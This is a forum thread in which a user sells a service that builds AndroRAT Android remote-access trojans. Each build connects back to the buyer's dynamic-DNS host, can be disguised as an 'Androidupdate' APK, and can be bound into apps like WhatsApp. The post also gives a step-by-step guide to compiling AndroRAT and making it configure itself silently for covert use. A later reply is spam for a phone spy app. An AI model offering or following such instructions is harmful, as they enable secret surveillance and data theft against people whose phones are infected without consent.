THREAD: Android Spy Phone Tutorial and Service
  1. 01-02-2014, 01:16 AM
    FAKA_ELITE's Avatar
    FAKA_ELITE
    [move]H4CK3R T34M[/m
    FAKA_ELITE's Avatar
    FAKA_ELITE
    [move]H4CK3R T34M[/m
    1,091
    Posts
    7,408
    Reputation
    Apr 2010
    NextGenUpdate
    Free Vouch copys for the firsts 5 Elite users posting in this thread


    Hi guys,


    I want to provide a great service for the Android Phone scene.
    There is a open source from the Androrat " For the ones who dont know what this is i will post on the buttom"
    but you have to compile the Androrat for yourself to have acess on the Infected Phone.

    So with my service you just have to tell me your NO-IP username and the Port you want the Infected phone connects to you. If you want you can provide a cell phone number and when you install your server it will send you a message.



    Instructions: For the Client "Laptop/PC"

    1- Download and install latest Java Runtine environment for your O.S

    2- Download: You must login or register to view this content. and open Androrat.jar, if you have latest JAVA it will open like this.

    You must login or register to view this content.

    If not open just install latest Java Runtine environment for your O.S

    3- When you open you have to change the Port settings "Go on server/select port and choose the port you want" i have my port 8181.
    After this close and open the tool again.

    4-Download NO-IP - You must login or register to view this content.
    And create an account, if you dont know how to do this check this video.



    5-Open your NO-IP DUC put your username and password and and choose the Host you have created before. Like this.

    You must login or register to view this content.


    ------------------------------------------------------------------------

    Instructions: For the Server "SmartPhone Android"

    1-Install the APK

    2-Its only that!

    ----------------------------------------------------------------

    The tool and the Options:

    You must login or register to view this content.

    You must login or register to view this content.

    You must login or register to view this content.

    ----------------------------------------------------------------

    My Service: PM This INFO

    1-Send me your NO-IP host name "Ex:xxxxxx.no-ip.org"

    2-The port you want the server connect "Ex-8181"

    3-Optional, send me your phone number if you want to receive one message anytime the server install in one phone.

    4-Tell me the name you want the APK have on install. "Ex-Androidupdate.APK"

    4-Pay to my PAYPAL 10eur as a gift or family.



    Bind Service:

    1-Send me your NO-IP host name "Ex:xxxxxx.no-ip.org"

    2-The port you want the server connect "Ex-8181"

    3-Optional, send me your phone number if you want to receive one message anytime the server install in one phone.

    4-Tell me the name you want the APK have on install. "Ex-Androidupdate.APK"

    5-Tell me what APP you want the Androrat goes with "Ex-whatsapp.apk the Androrat install Binded with the APP you choose, if its a payed APP you have to send me a download link" some APP“s dont BIND so tell me more then one so i can try to Bind and send to you.

    6-With this Pack you can add my Skype for assistance anytime.
    Skype- FAKA.ELITE

    7- Pay 20eur to my PAYPAL

    ---------------------------------------------------------------------------------------



    T.O.S:

    Im not affiliated with Androrat or APKTOOL and cannot offer support for either item.
    Those are open source and public and are on Internet.
    This service its for personal use only in your own phone, buying my services you agree im not responsible for any harm done or legal issues.




    Androrat:Compile yourself tutorial



    What you will need:
    Spoiler (Click to Hide)
    -Android Developer Tools ( download from: https://developer.android.com/sdk/index.html)
    -Java runtime installed (download from java website)
    -AndroRAT source (download from: https://github.com/RobinDavid/androrat) - link dead, the creator probably deleted it so the project is either dead or moved to somewhere else.
    -Some basic java knowledge is recommened but not required

    Getting started:
    Spoiler (Click to Hide)
    Download the developer tools, extract and run extracted_folder\eclipse\eclipse.exe

    Should look like this:
    https://pokit.org/get/?694b572d8dd2ea4383...b4f8be.jpg
    ---Preparing the SDK---
    Spoiler (Click to Hide)
    First we will prepare the SDK to compile this one. The SDK came with the basic tools and libraries, but we need to download more packs to compile AndroRAT. In eclipse, click:
    -Window
    -Android SDK Manager

    This should open:
    https://pokit.org/get/img/140fc0086722aec...b15722.jpg
    I checked the Android App and it needs API level 2.2.
    THAT DOES NOT MEAN IT IS ONLY FOR 2.2 !!!
    Its the minimum requirement, it will run in GingerBread 2.2 and up! (2.3, HC, ICS, JB)

    Select these:
    https://pokit.org/get/?4c134bb99a72156984...f226be.jpg
    and click on install packages, accept anything that pops up, and wait for the download to finish. You might need to relaunch eclipse if you already openned it.

    --- Compiling the APK ---
    Spoiler (Click to Hide)
    Now go to
    -File
    -New
    -Project

    And select this:
    https://pokit.org/get/img/b39b62f073e935b...f60124.jpg
    On the new window, click browse and select this:
    https://pokit.org/get/img/5abce0a19753210...807710.jpg
    And click OK, this should appear:
    https://pokit.org/get/img/8b56751007ba272...d0dcc1.jpg
    notice that i already checked the project in the screenshot, do the same when you come to this point.

    Now click finish and it will load the project into eclipse. (the project name is LauncherActivity )

    Now, you can compile this app without problems, but it will ask you on startup (when installed on the phone and launched) for the IP adress of your server (your NO-IP host since you will hide behind that i assume). BUUUUT that wouldnt be much of a super secret rat now, would it? We will change this source later on to make it automaticly configure itself on startup and go to background (I will add that on a later date as Im a android developer who has a lot to do these days and as soon as I finish my next milestone I will update this)

    You can click this button shown on the image to compile the apk (when asked as what you would compile it, select Android Application)
    https://pokit.org/get/img/441725f5a473570...ca2240.jpg
    Note: the apk will be located in the bin folder inside the project folder!

    --- Compiling the server ---
    Spoiler (Click to Hide)
    Ok now lets compile the server

    click on:
    -File
    -import

    Now select this since this is an app for PC
    https://pokit.org/get/img/ce5bee728d1439e...6afbac.jpg
    Again, click on browse when the new window shows up, and select this:
    https://pokit.org/get/img/9e27038f2fb8963...6c4780.jpg
    The folder selected is AndroRat server in the src folder found inside the source archive downloaded from github.
    Thats the java app which I already compile and is available on HF, but you will want to do it yourself later on as new versions come out.

    Again, we have this screen, just tick the project and click on finish:
    https://pokit.org/get/?8b754abb3dc6668695...e40285.jpg
    but what is that Gasp
    https://pokit.org/get/img/6dcd08b7cc66e7b...53cbe1.jpg
    it shows an error on the project! Well lets take a look...

    Right click on the project folder (in eclipse, the icon with the " ! " sign)
    and on the new window select this on the left side:
    https://pokit.org/get/img/a648f2ab74a52bd...52bc85.jpg
    and change to the tab from the screenshot (Libraries)

    Now we see the culprit who caused the errors! Those libraries with the "x" mark arent found by eclipse, so we will delete them.
    Select them all and click on "Remove" (on the right of the window)

    Ok but this didnt solve much as the project still needs those libraries. Now we will load them. On the same window click this:
    https://pokit.org/get/img/c716e2da252c2da...b570a7.jpg
    Navigate to here: (androrat-master\src\api)
    https://pokit.org/get/img/6bb21b81e3cd44d...c9806d.jpg
    You can see all those missing libraries now. Select them all and click on Open. They will be added to the project and we are nearly done now.

    Click on OK and watch the errors dissapear.

    Clean it is:
    https://pokit.org/get/img/cac7a354ea123c1...1b8dde.jpg
    Now the final step, compile it.
    Click on:
    File
    Export
    And select this:

    https://pokit.org/get/img/9c5c598d9fe373f...d21f2b.jpg
    Set the options in the next screen to look like here:
    https://pokit.org/get/img/616dc74417acbe9...6b9a4f.jpg
    Then click browse, and choose where it will be saved, like here:
    https://pokit.org/get/img/d94860e36b026e0...33a616.jpg
    Click finish and watch it compiling, you will get 2 warnings, click OK on each one and you can run the compiled jar file!

    Result:
    https://pokit.org/get/img/b920901460a5ee9...f11d12.jpg
    -- Modifying the apk to autoconfigure to our server --
    Spoiler (Click to Hide)
    OK this is really short and easy but I thought earlier it will take a bit more time so I didnt even try till I finished all my work lol. What you have to do is:
    -open this class file (LauncherActivity):
    https://pokit.org/get/img/7ffdb17c7d118d7...4f295a.jpg
    -delete ALL its content and replace with this:
    https://dl.dropbox.com/u/67764496/AndroRat/source.txt
    -edit the obvious parts:
    https://pokit.org/get/img/3fc0af2aafee9c9...087461.jpg
    Instead of the NOIP host you can ofc put your ip there but I dont recommend doing that..

    -compile and you are good to go Smile
    Last edited by FAKA_ELITE ; 01-17-2014 at 12:43 AM.

  2. The Following User Thanked FAKA_ELITE For This Useful Post:


  3. 08-15-2020, 10:54 AM
    Kendry3's Avatar
    Kendry3
    Rookie
    Kendry3's Avatar
    Kendry3
    Rookie
    5
    Posts
    10
    Reputation
    Aug 2020
    NextGenUpdate
    Sorry for my late input. Though it's too late to reply in this thread. But I want to say something about using the best spy app for iPhone visit You must login or register to view this content. for getting some more about Minspy. This free app allows me to spy my iPhone and it's security. I'm so much excited about using this app so far.
    Last edited by Kendry3 ; 08-15-2020 at 10:55 AM.